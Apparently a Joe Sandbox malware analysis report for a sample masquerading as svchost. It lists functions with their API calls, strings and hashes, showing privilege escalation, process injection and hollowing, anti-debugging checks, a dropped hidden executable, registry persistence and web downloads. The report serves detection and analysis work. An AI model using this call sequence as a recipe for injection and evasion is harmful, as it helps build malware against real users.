Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
String ID: SeDebugPrivilege
API String ID: 2379135442-2896544425
Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction ID: f4f1afc37bda6ab2966feee90dab60963b9cafca664fda60ee59a040e09569d8
Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction Fuzzy Hash: BD41B17291868586E790DB10F86431AF7A5FBC8B44F904136EA8983A98CF7DD448CF51

Function 00007FF7E52B4264 Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3481), ref: 00007FF7E52B4268
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3481), ref: 00007FF7E52B427B
GetTokenInformation.KERNELBASE ref: 00007FF7E52B42AC
GetTokenInformation.KERNELBASE ref: 00007FF7E52B42DE
CloseHandle.KERNEL32 ref: 00007FF7E52B42ED

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleOpen
String ID:
API String ID: 434396405-0
Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction ID: 7f8dff981f72ea310a778e564df07ac2d989e100c879d5eeba9dd70d8ccdef55
Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction Fuzzy Hash: 14311C72A1C64586DB94DB15E8A072EF768FBC8B80F545136FA8E83B68DF3CD4418B11

Function 00007FF7E52B2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF7E52B2D6F
WriteProcessMemory.KERNELBASE ref: 00007FF7E52B2DC1
VirtualProtectEx.KERNEL32 ref: 00007FF7E52B2DF7

Strings

@, xrefs: 00007FF7E52B2D54

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Virtual$AllocMemoryProcessProtectWrite
String ID: @
API String ID: 4073123320-2766056989
Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction ID: 8bd6eb75e1dd366afb0af4d1cc9c21161b6f15c8e3c874c67a4402ec841e8451
Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction Fuzzy Hash: CE41E47260CB8986E7B0DB15E86436BB7A4F788B84F504126EACD83B58DF7DE4448B41

Function 00007FF7E52B46E4 Relevance: 25.7, APIs: 17, Instructions: 155
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7E52B472B
GetFileSize.KERNEL32 ref: 00007FF7E52B474C
GetProcessHeap.KERNEL32 ref: 00007FF7E52B4762
RtlAllocateHeap.NTDLL ref: 00007FF7E52B477B
CloseHandle.KERNEL32 ref: 00007FF7E52B4793

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateHandleProcessSize
String ID:
API String ID: 2693768547-0
Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction ID: b869d4c742584af1cf125b9547f8ae6701698a2acdf4f693115a0e6ca67554e8
Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction Fuzzy Hash: A2812172A08B8582EB50DB55F89436AF7A5FBC9B90F504136EA8D87B68DF3CD044CB11

Function 00007FF7E52B38C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2

SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995

Strings

.exe, xrefs: 00007FF7E52B3986

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 1846285901-4119554291
Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction ID: 39e499edb2183f20f55127a5609ddfabdb163c6d6e592bf69cfb54d3bbb0af6a
Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction Fuzzy Hash: AC11516162898A81DFA4AF25FC6436AA365FBC8F80F845033DA4E87A28DE3CD104C711

Function 00007FF7E52B4004 Relevance: 7.5, APIs: 5, Instructions: 35
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B4022
Process32FirstW.KERNEL32 ref: 00007FF7E52B4054
wcscmp.MSVCRT ref: 00007FF7E52B406B
CloseHandle.KERNELBASE ref: 00007FF7E52B40A1

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
String ID:
API String ID: 2850635065-0
Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction ID: e8a55d8741fd77ba7457c4708f840c4cebe50378b922e222d86fb7c7cd482f0a
Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction Fuzzy Hash: 561137B190C68981EBB4AB10E89836AB365FB98B54F404736C69D82698DF3DD504CB51

Function 00007FF7E52B3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
wsprintfW.USER32 ref: 00007FF7E52B38A2

Strings

%08lX%04lX%lu, xrefs: 00007FF7E52B3893

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu
API String ID: 3001812590-640692576
Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction ID: a4f14c1172be88d4579fd17a668df9162e9b1aba96832658460c891d6d0af302
Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction Fuzzy Hash: 97311A6661C5C5C6DB70DB64E8983AAB3A4FB98B00F904136E68DC3A58DB3DD548CB11

Function 00007FF7E52B321C Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7E52B346D), ref: 00007FF7E52B3220
GetCurrentProcess.KERNEL32 ref: 00007FF7E52B3236
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF7E52B3244

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: DebuggerPresent$CheckCurrentProcessRemote
String ID:
API String ID: 3920101602-0
Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction ID: 4fdced95383a57ac55d12e27afe95ec88d3bf100efd3725822349d713ae0b837
Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction Fuzzy Hash: 3EF0546190C24681EFB067556C24379A794BF59F04F844176D58D85594CF3CED05DB32

Function 00007FF7E52B43A4 Relevance: 4.5, APIs: 3, Instructions: 21
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNELBASE ref: 00007FF7E52B43B9
GetLastError.KERNEL32 ref: 00007FF7E52B43D0
CloseHandle.KERNEL32 ref: 00007FF7E52B43E2

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction ID: 38de4d05bd51f37cfddc8f89d8b6af7f5991f24882226d5ab15533cf611d4343
Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction Fuzzy Hash: 02F0EC74C0C649D2DBA47B20E85537DA368FB59B00FA40232D54EC2650CF3CD0058631

Function 00007FF7E52B32EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995

Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B

CreateThread.KERNEL32 ref: 00007FF7E52B3376

Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249

Strings

.x64, xrefs: 00007FF7E52B3304

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: lstrcat$CreateProcess$CloseFileHandleOpenToken$AdjustAttributesCurrentDirectoryFolderLookupPathPrivilegePrivilegesThreadValue
String ID: .x64
API String ID: 3156018730-2481150777
Opcode ID: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
Instruction ID: 5caf0dfe925e994e27af1fdcf07abfc97f68b44c98acf041ba3a3a07d89b7c0f
Opcode Fuzzy Hash: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
Instruction Fuzzy Hash: C701DBA1E1854A81EE94FB14FC653B5A679AF98B04FC58533D40DC2196CE3CE145C763

Function 00007FF7E52B1050 Relevance: 3.0, APIs: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FF7E52B1063
GetProcAddress.KERNEL32 ref: 00007FF7E52B1078

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction ID: 797435ddb680424ebbc96c2ef9b9917cb678864f7979cf6a571397b3ccc79694
Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction Fuzzy Hash: DBE09276508F8486CA60AB15F85011EB7B4FBC8B94F944526EACD82B28DF3CC165CB00

Function 00007FF7E52B3B24 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 00007FF7E52B3B42

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction ID: 5b047fbe46b6ce5d9f51d02e9ba33a8e1ff88cf3c86a7bcb6f101778fef8bbcb
Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction Fuzzy Hash: 7FD01261E3894581EBD5AB26EC99719E3A4FBD8F44FC4C036E68A81568CF3CD0998F11

Non-executed Functions

Function 00007FF7E52B2048 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B20AD

Strings

ntdll, xrefs: 00007FF7E52B2399
NtUnmapViewOfSection, xrefs: 00007FF7E52B23AE
@, xrefs: 00007FF7E52B2429
.reloc, xrefs: 00007FF7E52B264F

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: FileModuleName
String ID: .reloc$@$NtUnmapViewOfSection$ntdll
API String ID: 514040917-3001742581
Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction ID: af8e1d7dd572e00a3e9885ed2d59cf6c6c00ae16a050c4d2f9aca983e9266a1d
Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction Fuzzy Hash: 9432FA7261CBC586EBB5DB15E8647AAB3A5FBC8B40F804136DA8D83B58DF3CD4448B11

Function 00007FF7E52B1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF7E52B1D20
Sleep.KERNEL32 ref: 00007FF7E52B1D38
InternetOpenUrlW.WININET ref: 00007FF7E52B1D64
InternetOpenUrlW.WININET ref: 00007FF7E52B1D9B
InternetCloseHandle.WININET ref: 00007FF7E52B1DB3
Sleep.KERNEL32 ref: 00007FF7E52B1DBE
HttpQueryInfoA.WININET ref: 00007FF7E52B1DEE
InternetCloseHandle.WININET ref: 00007FF7E52B1DFD
InternetCloseHandle.WININET ref: 00007FF7E52B1E08
Sleep.KERNEL32 ref: 00007FF7E52B1E13
InternetCloseHandle.WININET ref: 00007FF7E52B1E2D
InternetOpenUrlW.WININET ref: 00007FF7E52B1E57
InternetCloseHandle.WININET ref: 00007FF7E52B1E6F
Sleep.KERNEL32 ref: 00007FF7E52B1E7A
HttpQueryInfoA.WININET ref: 00007FF7E52B1EB2
GetProcessHeap.KERNEL32 ref: 00007FF7E52B1EC1
RtlAllocateHeap.NTDLL ref: 00007FF7E52B1ED7
InternetCloseHandle.WININET ref: 00007FF7E52B1EEF
InternetCloseHandle.WININET ref: 00007FF7E52B1EFA
InternetReadFile.WININET ref: 00007FF7E52B1F37
InternetCloseHandle.WININET ref: 00007FF7E52B1F6D
InternetCloseHandle.WININET ref: 00007FF7E52B1F78

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E52B1D19

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
API String ID: 2307068205-2771526726
Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction ID: 939b8382344564756b92c14c89de0f08a0c4e38c2040c5ce4046036d76f00fc2
Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction Fuzzy Hash: 1D71FBB651CA4586EB909B54F86432AF764FBC8B95F501036FA8E83A68CF7CD444CB11

Function 00007FF7E52B30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E52B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B460C
Part of subcall function 00007FF7E52B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4649
Part of subcall function 00007FF7E52B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4654

Part of subcall function 00007FF7E52B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B311C), ref: 00007FF7E52B3BC7
Part of subcall function 00007FF7E52B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3BFD
Part of subcall function 00007FF7E52B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7E52B3C0C

Part of subcall function 00007FF7E52B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E52B3C3C

Part of subcall function 00007FF7E52B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B3E37

Part of subcall function 00007FF7E52B3E24: Process32FirstW.KERNEL32 ref: 00007FF7E52B3E6A
Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3E7C

